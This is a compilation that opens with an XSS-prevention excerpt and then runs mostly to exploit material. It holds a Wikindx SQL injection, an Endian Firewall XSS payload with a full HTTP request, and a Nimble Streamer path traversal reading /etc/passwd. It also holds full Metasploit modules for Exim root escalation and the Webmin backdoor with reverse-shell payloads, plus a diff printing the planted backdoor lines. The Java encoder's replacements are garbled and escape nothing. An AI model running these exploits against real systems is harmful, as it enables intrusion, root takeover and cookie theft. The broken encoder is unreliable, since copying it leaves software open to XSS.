<https://urldefense.proofpoint.com/v2/url?u=https-3A__www.owasp.org_index.php_XSS-5F-28Cross-5FSite-5FScripting-29-5FPrevention-5FCheat-5FSheet&d=DwMFaQ&c=0DdzT34RfO2GGahVO5PumQ&r=8BdtPm_N-eOWc3EZEL8jVSXu4k5FAchn6mFgL-Knnhk&m=vCgg57fKEnLqhRpyRjhiXZxSZ258jYrO_CX_VtudPYo&s=zSunO4Eh5lUFVUfM2fblWQ2XLe-woCC3pG3gz4_fb10&e=>



• Output encoding: It is recommended to implement ‘output encoding’ to
convert untrusted input into a safe form where the input is displayed as
data to the user without executing as code in the browser.



Java HTML encoding Function

public static String HTMLEncode(String aTagFragment){

     final StringBuffer result = new StringBuffer();

     final StringCharacterIterator iterator = new

                                    StringCharacterIterator(aTagFragment);

     char character =  iterator.current();

     while (character != StringCharacterIterator.DONE )

     {

       if (character == '<')  result.append("<");

       else if (character == '>') result.append(">");

       else if (character == '\"')  result.append(""");

       else if (character == '\'')  result.append("'");

       else if (character == '\\') result.append("\");

       else if (character == '&')  result.append("&");

       else {

            //the char is not a special one

            //add it to the result as is

            result.append(character);

       }

       character = iterator.next();

     }

     return result.toString();

  }



• Escaping: Escape all untrusted data based on the HTML context (body,
attribute, JavaScript, CSS, or URL) that the data will be placed into.

EASPI API

String safe = ESAPI.encoder().encodeForHTML( request.getParameter( "input"
) );



• Filtering input parameter: Positive or "whitelist" input validation with
appropriate canonicalization is the recommended filtering technique.
Alternatively, black-list filtering input works by removing some or all
special characters from your input. Special characters are characters that
enable script to be generated within an HTML stream. Special characters
include the following:

<> "' % ; ) ( & + -

JavaScript Codefunction RemoveBad(strTemp) {

    strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|\-/g,"");

    return strTemp;

}

###################################################################

# Exploit Title : Wikindx 5.8.2 Virtual Research Environment Library Manager SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 23/03/2019
# Vendor Homepage : wikindx.sourceforge.net
# Software Download Link : sourceforge.net/projects/wikindx/files/latest/download
# Software Version : 5.x - 5.8.2
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Description about Software :
***************************
Wikindx is a free Virtual Research Environment (an online bibliographic and 
quotations/notes management and article authoring system) designed either 
for single use (on a variety of operating systems) or multi-user collaborative 
use across the internet.

###################################################################

# Impact :
***********
Wikindx 5.8.2 Virtual Research Environment Library Manager is prone to an 
SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data 
before using it in an SQL query. Exploiting this issue could allow an attacker to 
compromise the application, access or modify data, or exploit latent vulnerabilities 
in the underlying database. A remote attacker can send a specially crafted request 
to the vulnerable application and execute arbitrary SQL commands in a
pplication`s database. Further exploitation of this vulnerability may result in 
unauthorized data manipulation. An attacker can exploit this issue using a browser 
or with any SQL Injector Tool.

###################################################################

# Admin Panel Login Path :
*************************
/index.php?action=usersgroups_MYWIKINDX_CORE

# SQL Injection Exploit :
**********************
/index.php?action=list_LISTSOMERESOURCES_CORE&method=categoryProcess&id=[SQL Injection]&type=lastMulti

/index.php?action=list_LISTSOMERESOURCES_CORE&method=categoryProcess&id=[ID-NUMBER]&PagingStart=[SQL Injection]

/index.php?action=list_LISTSOMERESOURCES_CORE&method=categoryProcess&id=1&PagingStart=[SQL Injection]

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################

# Exploit Title: Endian Firewall cross-site scripting (XSS)
# Date: 08/22/2019
# Exploit Authors: Milad Soltanian + G0dfather ( @irpwn )
# Vendor Homepage: https://www.endian.com
# Version : 3.3.0

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.



1 - login

2 - open the url below to edit network configuration

3 - forward the step till u face  Step 3/8: Network preferences 

4 - now put the payload in IP address input 

[PAYLOAD] = "><img src=aWd3l onerror=alert(document.cookie)><!--




[EXAMPLE REQUESTE]

POST /cgi-bin/netwizard.cgi HTTP/1.1
Host: 5.9.96.86:10443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 272
Authorization: Basic YWRtaW46bWEhQCM0NTY=
Connection: close
Referer: https://192.168.1.10:10443/cgi-bin/netwizard.cgi
Cookie: en-visit=216e4cac7868d0ca041c21489faa817d1a8faca5; session_id=2fcdb768fee725b270598427fa6f4ed10f6774ca; endian_webshell=354369204
Upgrade-Insecure-Requests: 1

session_id=174960656&step=3&DHCP_ENABLE_GREEN=on&DISPLAY_GREEN_ADDRESS=%22%3E%3Cimg+src%3DaWd3l+onerror%3Dalert%28document.cookie%29%3E%3C%21--&DISPLAY_GREEN_NETMASK=24&DISPLAY_GREEN_ADDITIONAL=&GREEN_DEVICES=0&HOSTNAME=efw-82aabd1d48&DOMAINNAME=localdomain&next=%3E%3E%3E

# Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal
# Exploit Author: MAYASEVEN
# Source at "https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/"
# Published on 08/04/2019
# Vendor Homepage at "https://wmspanel.com/nimble"
# Affected Version 3.0.2-2 to 3.5.4-9
# Tested on 3.5.4-9
# CVE-2019-11013 Nimble Streamer 3.0.2-2 to 3.5.4-9 Path Traversal
# Description: Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability.
#              Successful exploitation could allow an attacker to traverse the file system to access
#              files or directories that are outside of the restricted directory on the remote server.


POC :
 - http://somesite.com/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'expect'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Exim 4.87 - 4.91 Local Privilege Escalation',
'Description'    => %q{
        This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).
        Improper validation of recipient address in deliver_message()
        function in /src/deliver.c may lead to command execution with root privileges
        (CVE-2019-10149).
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'Qualys', # Discovery and PoC (@qualys)
'Dennis Herrmann', # Working exploit (@dhn)
'Marco Ivaldi', # Working exploit (@0xdea)
'Guillaume André' # Metasploit module (@yaumn_)
        ],
'DisclosureDate' => '2019-06-05',
'Platform'       => [ 'linux' ],
'Arch'           => [ ARCH_X86, ARCH_X64 ],
'SessionTypes'   => [ 'shell', 'meterpreter' ],
'Targets'        =>
        [
          [
'Exim 4.87 - 4.91',
            lower_version: Gem::Version.new('4.87'),
            upper_version: Gem::Version.new('4.91')
          ]
        ],
'DefaultOptions' =>
        {
'PrependSetgid' => true,
'PrependSetuid' => true
        },
'References'     =>
        [
          [ 'CVE', '2019-10149' ],
          [ 'EDB', '46996' ],
          [ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]
        ]
    ))

    register_options(
      [
        OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])
      ])

    register_advanced_options(
      [
        OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),
        OptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]),
        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
      ])
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def encode_command(cmd)
'\x' + cmd.unpack('H2' * cmd.length).join('\x')
  end

  def open_tcp_connection
    socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)
      params = Rex::Socket::Parameters.new({
'PeerHost' => '127.0.0.1',
'PeerPort' => datastore['EXIMPORT']
      })
      begin
        socket = socket_subsystem.create_tcp_client_channel(params)
      rescue => e
        vprint_error("Couldn't connect to port #{datastore['EXIMPORT']}, "\
"are you sure exim is listening on this port? (see EXIMPORT)")
        raise e
      end
    return socket_subsystem, socket
  end

  def inject_payload(payload)
    if session.type == 'meterpreter'
      socket_subsystem, socket = open_tcp_connection

      tcp_conversation = {
        nil                                          => /220/,
'helo localhost'                             => /250/,
"MAIL FROM:<>"                               => /250/,
"RCPT TO:<${run{#{payload}}}@localhost>"     => /250/,
'DATA'                                       => /354/,
'Received:'                                  => nil,
'.'                                          => /250/
      }

      begin
        tcp_conversation.each do |line, pattern|
          Timeout.timeout(datastore['SendExpectTimeout']) do
            if line
              if line == 'Received:'
                for i in (1..31)
                  socket.puts("#{line} #{i}\n")
                end
              else
                socket.puts("#{line}\n")
              end
            end
            if pattern
              socket.expect(pattern)
            end
          end
        end
      rescue Rex::ConnectionError => e
        fail_with(Failure::Unreachable, e.message)
      rescue Timeout::Error
        fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')
      ensure
        socket.puts("QUIT\n")
        socket.close
        socket_subsystem.shutdown
      end
    else
      unless cmd_exec("/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}'"\
"&& echo true").chomp.to_s == 'true'
        fail_with(Failure::NotFound, "Port #{datastore['EXIMPORT']} is closed")
      end

      bash_script = %|
        #!/bin/bash

        exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}
        read -u 3 && echo $REPLY
        echo "helo localhost">&3
        read -u 3 && echo $REPLY
        echo "mail from:<>">&3
        read -u 3 && echo $REPLY
        echo 'rcpt to:<${run{#{payload}}}@localhost>'>&3
        read -u 3 && echo $REPLY
        echo "data">&3
        read -u 3 && echo $REPLY
        for i in $(seq 1 30); do
          echo 'Received: $i'>&3
        done
        echo ".">&3
        read -u 3 && echo $REPLY
        echo "quit">&3
        read -u 3 && echo $REPLY
      |

      @bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
      write_file(@bash_script_path, bash_script)
      register_file_for_cleanup(@bash_script_path)
      chmod(@bash_script_path)
      cmd_exec("/bin/bash -c \"#{@bash_script_path}\"")
    end

    print_status('Payload sent, wait a few seconds...')
    Rex.sleep(5)
  end

  def check_for_bash
    unless command_exists?('/bin/bash')
      fail_with(Failure::NotFound, 'bash not found')
    end
  end

  def on_new_session(session)
    super

    if session.type == 'meterpreter'
      session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
      session.fs.file.rm(@payload_path)
    else
      session.shell_command_token("rm -f #{@payload_path}")
    end
  end

  def check
    if session.type == 'meterpreter'
      begin
        socket_subsystem, socket = open_tcp_connection
      rescue
        return CheckCode::Safe
      end
      res = socket.gets
      socket.close
      socket_subsystem.shutdown
    else
      check_for_bash
      res = cmd_exec("/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && "\
"(read -u 3 && echo $REPLY) || echo false'")
      if res == 'false'
         vprint_error("Couldn't connect to port #{datastore['EXIMPORT']}, "\
"are you sure exim is listening on this port? (see EXIMPORT)")
         return CheckCode::Safe
      end
    end

    if res =~ /Exim ([0-9\.]+)/i
      version = Gem::Version.new($1)
      vprint_status("Found exim version: #{version}")
      if version >= target[:lower_version] && version <= target[:upper_version]
        return CheckCode::Appears
      else
        return CheckCode::Safe
      end
    end

    CheckCode::Unknown
  end

  def exploit
    if is_root?
      unless datastore['ForceExploit']
        fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
      end
    end

    unless writable?(base_dir)
      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
    end

    if nosuid?(base_dir)
      fail_with(Failure::BadConfig, "#{base_dir} is mounted nosuid")
    end

    unless datastore['PrependSetuid'] && datastore['PrependSetgid']
      fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \
'to get root privileges.')
    end

    if session.type == 'shell'
      check_for_bash
    end

    @payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
    write_file(@payload_path, payload.encoded_exe)
    register_file_for_cleanup(@payload_path)
    inject_payload(encode_command("/bin/sh -c 'chown root #{@payload_path};"\
"chmod 4755 #{@payload_path}'"))

    unless setuid?(@payload_path)
      fail_with(Failure::Unknown, "Couldn't escalate privileges")
    end

    cmd_exec("#{@payload_path} & echo ")
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
'Name'               => 'Webmin password_change.cgi Backdoor',
'Description'        => %q{
        This module exploits a backdoor in Webmin versions 1.890 through 1.920.
        Only the SourceForge downloads were backdoored, but they are listed as
        official downloads on the project's site.

        Unknown attacker(s) inserted Perl qx statements into the build server's
        source code on two separate occasions: once in April 2018, introducing
        the backdoor in the 1.890 release, and in July 2018, reintroducing the
        backdoor in releases 1.900 through 1.920.

        Only version 1.890 is exploitable in the default install. Later affected
        versions require the expired password changing feature to be enabled.
      },
'Author'             => [
'AkkuS', # (Özkan Mustafa Akkuş) Discovery and independent module
'wvu'    # This module and updated information about the backdoor
      ],
'References'         => [
        ['CVE', '2019-15107'], # y tho
        ['URL', 'http://www.webmin.com/exploit.html'],
        ['URL', 'https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html'],
        ['URL', 'https://blog.firosolutions.com/exploits/webmin/'],
        ['URL', 'https://github.com/webmin/webmin/issues/947']
      ],
'DisclosureDate'     => '2019-08-10',
'License'            => MSF_LICENSE,
'Platform'           => ['unix', 'linux'],
'Arch'               => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged'         => true,
'Targets'            => [
        ['Automatic (Unix In-Memory)',
'Platform'       => 'unix',
'Arch'           => ARCH_CMD,
'Version'        => [
            Gem::Version.new('1.890'), Gem::Version.new('1.920')
          ],
'Type'           => :unix_memory,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'}
        ],
        ['Automatic (Linux Dropper)',
'Platform'       => 'linux',
'Arch'           => [ARCH_X86, ARCH_X64],
'Version'        => [
            Gem::Version.new('1.890'), Gem::Version.new('1.920')
          ],
'Type'           => :linux_dropper,
'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'}
        ]
      ],
'DefaultTarget'      => 0,
'Notes'              => {
'Stability'        => [CRASH_SAFE],
'Reliability'      => [REPEATABLE_SESSION],
'SideEffects'      => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
      }
    ))

    register_options([
      Opt::RPORT(10000),
      OptString.new('TARGETURI', [true, 'Base path to Webmin', '/'])
    ])

    register_advanced_options([
      OptBool.new('ForceExploit', [false, 'Override check result', false])
    ])
  end

  def check
    res = send_request_cgi(
'method' => 'GET',
'uri'    => normalize_uri(target_uri.path)
    )

    unless res
      vprint_error('Server did not respond')
      return CheckCode::Unknown
    end

    version =
      res.headers['Server'].to_s.scan(%r{MiniServ/([\d.]+)}).flatten.first

    unless version
      vprint_error('Webmin version not detected')
      return CheckCode::Unknown
    end

    version = Gem::Version.new(version)

    vprint_status("Webmin #{version} detected")
    checkcode = CheckCode::Detected

    unless version.between?(*target['Version'])
      vprint_error("Webmin #{version} is not a supported target")
      return CheckCode::Safe
    end

    vprint_good("Webmin #{version} is a supported target")
    checkcode = CheckCode::Appears

    res = execute_command("echo #{token}")

    unless res
      vprint_error('Webmin did not respond to check command')
      return checkcode
    end

    if res.body.include?('Password changing is not enabled!')
      vprint_error('Expired password changing disabled')
      return CheckCode::Safe
    end

    if res.body.include?(token)
      vprint_good('Webmin executed a benign check command')
      checkcode = CheckCode::Vulnerable
    else
      vprint_error('Webmin did not execute our check command')
      return CheckCode::Safe
    end

    checkcode
  end

  def exploit
    # These CheckCodes are allowed to pass automatically
    checkcodes = [
      CheckCode::Appears,
      CheckCode::Vulnerable
    ]

    unless checkcodes.include?(check) || datastore['ForceExploit']
      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
    end

    print_status("Configuring #{target.name} target")

    case target['Type']
    when :unix_memory
      print_status("Sending #{datastore['PAYLOAD']} command payload")
      vprint_status("Generated command payload: #{payload.encoded}")

      res = execute_command(payload.encoded)

      if res && datastore['PAYLOAD'] == 'cmd/unix/generic'
        print_warning('Dumping command output in full response body')

        if res.body.empty?
          print_error('Empty response body, no command output')
          return
        end

        print_line(res.body)
      end
    when :linux_dropper
      print_status("Sending #{datastore['PAYLOAD']} command stager")
      execute_cmdstager
    end
  end

=begin
wvu@kharak:~/Downloads$ diff3 webmin-1.{890,930,920}/password_change.cgi
====2
1:1c
3:1c
  #!/usr/bin/perl
2:1c
  #!/usr/local/bin/perl
====1
1:12c
  $in{'expired'} eq '' || die $text{'password_expired'},qx/$in{'expired'}/;
2:12c
3:12c
  $miniserv{'passwd_mode'} == 2 || die "Password changing is not enabled!";
====3
1:40c
2:40c
    $enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'});
3:40c
    $enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);
====3
1:200c
2:200c
  # Show ok page
3:200c

wvu@kharak:~/Downloads$
=end
  def execute_command(cmd, _opts = {})
    send_request_cgi({
'method'    => 'POST',
'uri'       => normalize_uri(target_uri.path, 'password_change.cgi'),
'headers'   => {'Referer' => full_uri},
'vars_post' => {
        # 1.890
'expired' => cmd,
        # 1.900-1.920
'new1'    => token,
'new2'    => token,
'old'     => cmd
      }
    }, 3.5)
  end

  def token
    @token ||= Rex::Text.rand_text_alphanumeric(8..42)
  end

end